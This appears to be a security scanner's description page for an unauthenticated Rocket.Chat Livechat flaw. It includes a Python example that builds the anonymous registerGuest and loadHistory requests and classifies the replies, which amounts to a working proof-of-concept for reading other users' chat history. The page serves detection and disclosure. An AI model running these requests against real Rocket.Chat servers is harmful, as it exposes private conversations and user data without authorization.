RocketChat Unauthorized Admin Access Scanner

Detects 'Unauthorized Admin Access' vulnerability in RocketChat Live Chat. This scanner helps identify potential unauthenticated access to messages and user tokens in RocketChat Live Chat.

Short Info

Level: High
Single Scan
Can be used by: Asset Owner
Estimated Time: 10 seconds
Time Interval: 8 days 16 hours
Scan only one: Domain, IPv4, Subdomain
Toolbox: -

Rocket.Chat is an open-source messaging platform for team collaboration; Livechat (Omnichannel) is its embeddable widget that lets website visitors chat with agents without holding an account on the server. Organizations choose it for its flexibility in customization and deployment, covering both internal messaging and customer interaction. The platform offers group messaging, file sharing, and integrations with other productivity tools, and is used across industries including IT, education, and customer service. Rocket.Chat is valued for its real-time chat functionality and support for both individual and team communications, enabling effective information exchange and supporting team productivity.

The Unauthorized Admin Access vulnerability lets an attacker with no account read messages and obtain user tokens from a Rocket.Chat Livechat deployment. The root cause is missing access control on the anonymous method-call path: parameters chosen by the caller (a self-chosen visitor token, a room identifier) are accepted as-is instead of being checked against what that caller is actually entitled to see. The result is that unauthenticated users can read sensitive messages and other user-related data, which is a direct loss of confidentiality for every conversation held on the affected instance.

The exposure comes through Rocket.Chat's REST endpoint for anonymous Meteor method calls, `/api/v1/method.callAnon/<name>`; this scanner sends the request to `/api/v1/method.callAnon/cve_exploit`. The trailing path segment is only a label: the method that actually runs is the one named inside the JSON body, which carries a `message` field holding a DDP-style method call. Because the endpoint is meant for callers without a session, it does not verify a user identity, and the Livechat methods reached through it, `livechat:registerGuest` and `livechat:loadHistory`, did not adequately check the caller's entitlement either. Despite the vulnerability's name, these are Livechat visitor methods rather than administrative ones; the "admin" label reflects the effect (reading other users' messages), not the privilege level of the call. The parameters the scanner controls are `token` and `name` (supplied to `livechat:registerGuest` to create a visitor with a chosen token) and `token` and `rid` (supplied to `livechat:loadHistory` to request the message history of a room).
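The following is an added example, not code from this page or from Rocket.Chat, showing how a check of this kind assembles the `method.callAnon` requests and classifies the replies. It assumes the documented Rocket.Chat envelope for this endpoint: the request body is `{"message": "<JSON string of a DDP method call>"}` and the reply mirrors it with `{"message": "<JSON string of a DDP result>", "success": true}`. The path label `cve_exploit`, the parameter names `token`, `name` and `rid`, and the two method names are taken from the text above; the exact shape of the `livechat:loadHistory` result (a `messages` array) and the sample replies are constructed for the example. The HTTP transport is supplied by the caller as a function so the logic runs offline.

```python
"""Request builder and response classifier for a method.callAnon probe.

Added example, not the scanner's own code. Assumes the Rocket.Chat REST
envelope described in the lead-in; sample replies below are constructed.
"""
import json
import secrets

# The segment after method.callAnon/ is a label only; the real method name
# travels inside the `message` body. "cve_exploit" is the label this page names.
CALL_ANON_PATH = "/api/v1/method.callAnon/{label}"


def build_call_anon(method, params, label="cve_exploit", msg_id="1"):
    """Return (path, body) for an anonymous Meteor method call."""
    ddp = {"msg": "method", "id": msg_id, "method": method, "params": params}
    return CALL_ANON_PATH.format(label=label), json.dumps({"message": json.dumps(ddp)})


def decode_call_anon_body(body):
    """Unwrap the double-encoded request body back into the DDP call dict."""
    return json.loads(json.loads(body)["message"])


def register_guest_request(token, name):
    """Step 1: create a Livechat visitor bound to a token the caller chose."""
    return build_call_anon("livechat:registerGuest", [{"token": token, "name": name}])


def load_history_request(token, rid):
    """Step 2: ask for a room's history using that token and a room id."""
    return build_call_anon("livechat:loadHistory", [{"token": token, "rid": rid}])


def parse_call_anon_response(body):
    """Unwrap a reply. Returns {"ok", "result", "error"}; never raises on a
    malformed body, so a classifier can treat garbage as 'not exposed'."""
    try:
        outer = json.loads(body)
        if not outer.get("success"):
            return {"ok": False, "result": None, "error": outer.get("error") or "request failed"}
        inner = json.loads(outer["message"])
    except (ValueError, KeyError, TypeError):
        return {"ok": False, "result": None, "error": "unparseable envelope"}
    if "error" in inner:
        err = inner["error"] if isinstance(inner["error"], dict) else {"reason": str(inner["error"])}
        return {"ok": False, "result": None, "error": err.get("reason") or err.get("message")}
    return {"ok": True, "result": inner.get("result"), "error": None}


def history_exposed(body):
    """True only when a loadHistory reply actually carries messages.
    A successful envelope with an empty or missing `messages` list is not
    counted, which avoids false positives on rooms that are simply empty."""
    parsed = parse_call_anon_response(body)
    if not parsed["ok"] or not isinstance(parsed["result"], dict):
        return False
    return len(parsed["result"].get("messages") or []) > 0


def run_check(post, rid, name="probe"):
    """Two-step probe. `post(path, body) -> reply_text` is the caller's HTTP
    transport. Returns (exposed, detail). Note the side effect on a live
    target: step 1 creates a visitor record for the random token."""
    token = secrets.token_hex(16)
    path, body = register_guest_request(token, name)
    reg = parse_call_anon_response(post(path, body))
    if not reg["ok"]:
        return False, "registerGuest refused: %s" % reg["error"]
    path, body = load_history_request(token, rid)
    if history_exposed(post(path, body)):
        return True, "loadHistory returned messages for an unauthenticated guest token"
    return False, "loadHistory returned no messages"


# Constructed sample replies (not captured from a real server).
SAMPLE_GUEST_OK = json.dumps({"message": json.dumps(
    {"msg": "result", "id": "1", "result": {"token": "t", "visitor": {"name": "probe"}}}), "success": True})
SAMPLE_EXPOSED = json.dumps({"message": json.dumps(
    {"msg": "result", "id": "1", "result": {"messages": [
        {"_id": "m1", "rid": "GENERAL", "msg": "hello", "u": {"username": "alice"}}]}}), "success": True})
SAMPLE_DENIED = json.dumps({"message": json.dumps(
    {"msg": "result", "id": "1", "error": {"error": "error-not-allowed", "reason": "Not allowed"}}), "success": True})
SAMPLE_HTTP_FAIL = json.dumps({"success": False, "error": "Method not found"})


def fake_post_vulnerable(path, body):
    """Offline stand-in for HTTP: answers step 1 and step 2 like an exposed host."""
    method = decode_call_anon_body(body)["method"]
    return SAMPLE_GUEST_OK if method == "livechat:registerGuest" else SAMPLE_EXPOSED


if __name__ == "__main__":
    print(run_check(fake_post_vulnerable, rid="GENERAL"))
```

Two practical points follow from the structure above. First, the probe is not read-only: `livechat:registerGuest` creates a visitor record on the target, so a scanner should use a recognisable `name` and a throwaway token. Second, `history_exposed` keys on the presence of messages rather than on HTTP 200 or `"success": true`, because the anonymous endpoint returns a successful envelope even when the inner DDP call failed; a check that stops at the outer status would report every Rocket.Chat instance as vulnerable.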

If exploited, this vulnerability lets an attacker read chat logs and collect user information without ever authenticating, compromising the privacy of the communications held on the instance. The retrieved content can feed follow-on attacks such as spear-phishing or impersonation, and unauthorized message retrieval can expose proprietary information or private conversations. Because `livechat:registerGuest` is reachable anonymously, an attacker can also create visitor records at will and interfere with live chat sessions, disrupting normal operations and trust in the platform. For organizations that route customer or internal conversations through the affected instance, the exposure of that data is a serious incident for both the organization and its clients.
